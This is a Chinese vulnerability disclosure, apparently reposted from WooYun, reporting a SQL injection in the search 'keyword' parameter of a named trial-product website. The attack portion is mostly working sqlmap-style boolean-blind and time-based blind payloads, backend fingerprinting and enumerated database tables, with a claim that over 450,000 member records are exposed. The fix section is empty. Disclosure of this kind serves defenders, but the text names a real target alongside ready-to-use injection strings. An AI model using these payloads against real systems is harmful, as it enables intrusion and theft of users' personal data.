记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

试客联盟网众用助手站某处sql注入涉及45W会员信息

2015-10-21 01:10

漏洞地址:

code 区域
http://zhelp.shikee.com/home/search?keyword=a



keword参数存在注入

code 区域
---

Parameter: keyword (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: keyword=a%' AND 4924=4924 AND '%'='



Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: keyword=a%' AND (SELECT * FROM (SELECT(SLEEP(5)))yxoY) AND '%'='

---

[14:05:11] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.5.10

back-end DBMS: MySQL 5.0.12

漏洞证明:

数据库:

code 区域
available databases [2]:

[*] information_schema

[*] zhongyongapp





45W+会员信息泄漏

code 区域
Database: zhongyongapp

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| mobile_app_subsidy_apply_period | 9189697 |

| mobile_app_subsidy_apply_log | 7700434 |

| mobile_user_message | 5847387 |

| mobile_system_log_hlpay | 3023412 |

| mobile_app_subsidy_apply | 1956328 |

| mobile_app_downlog | 1316216 |

| mobile_app_subsidy_apply_step | 778630 |

| mobile_app_subsidy_rebates_pay | 778431 |

| mobile_members20150601 | 386149 |

| mobile_app_task_apply_log | 237048 |

| mobile_user_sign_log | 171401 |

| mobile_user_device | 149860 |

| mobile_user | 89294 |

| mobile_app_task_user_share_score | 84091 |

| mobile_user_invite_reward | 79963 |

| mobile_app_img | 67865 |

| mobile_system_subsidy | 62898 |

| mobile_system_subsidy_history | 61087 |

| mobile_app_task_apply | 54780 |

| mobile_app_task_rebates_pay | 33704 |

| mobile_user_invite | 31018 |

| mobile_system_task | 19270 |

| mobile_admin_log | 15890 |

| mobile_app_log | 15181 |

| mobile_system_task_log | 15129 |

| mobile_sql_log | 15104 |

| mobile_task_xls | 13879 |

| mobile_app | 13860 |

| mobile_user_sign | 13744 |

| mobile_app_collection | 8038 |

| mobile_user_comment | 7006 |

| mobile_app_subsidy_log | 4699 |

| mobile_user_suggest | 4606 |

| mobile_app_subsidy_period | 3594 |

| mobile_app_subsidy_finance | 3003 |

| mobile_app_task_log | 1896 |

| mobile_user_first_reward | 1596 |

| mobile_user_extend | 1593 |

| mobile_app_task | 1157 |

| mobile_app_subsidy | 1004 |

| mobile_task_pay | 734 |

| mobile_finance_log | 643 |

| mobile_user_open | 472 |

| mobile_app_subsidy_append | 467 |

| mobile_user_freeze_log | 382 |

| mobile_app_special_apply | 375 |

| mobile_task_img | 348 |

| mobile_app_task_option | 308 |

| mobile_app_category | 150 |

| mobile_message_board | 119 |

| mobile_task_extend | 74 |

| mobile_rebate_failure_log | 65 |

| mobile_help_img | 39 |

| mobile_system_config | 37 |

| mobile_app_special | 36 |

| mobile_common_session | 25 |

| mobile_help_category | 24 |

| mobile_help | 20 |

| mobile_web_home_advertisement | 19 |

| mobile_app_home_advertisement | 12 |

| mobile_app_task_apply_timeout_log | 1 |

+---------------------------------------+---------+



Database: information_schema

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| COLUMNS | 1285 |

| SESSION_VARIABLES | 445 |

| GLOBAL_VARIABLES | 431 |

| GLOBAL_STATUS | 341 |

| SESSION_STATUS | 341 |

| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |

| COLLATIONS | 219 |

| STATISTICS | 138 |

| PARTITIONS | 128 |

| TABLES | 128 |

| KEY_COLUMN_USAGE | 92 |

| TABLE_CONSTRAINTS | 85 |

| PLUGINS | 42 |

| CHARACTER_SETS | 40 |

| INNODB_FT_DEFAULT_STOPWORD | 36 |

| PROCESSLIST | 23 |

| SCHEMA_PRIVILEGES | 18 |

| PARAMETERS | 11 |

| ENGINES | 9 |

| REFERENTIAL_CONSTRAINTS | 3 |

| ROUTINES | 3 |

| SCHEMATA | 2 |

| TRIGGERS | 1 |

| USER_PRIVILEGES | 1 |

+---------------------------------------+---------+



1.png



修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0146950

阅读:86574 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“试客联盟网众用助手站某处sql注入涉及45W会员信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云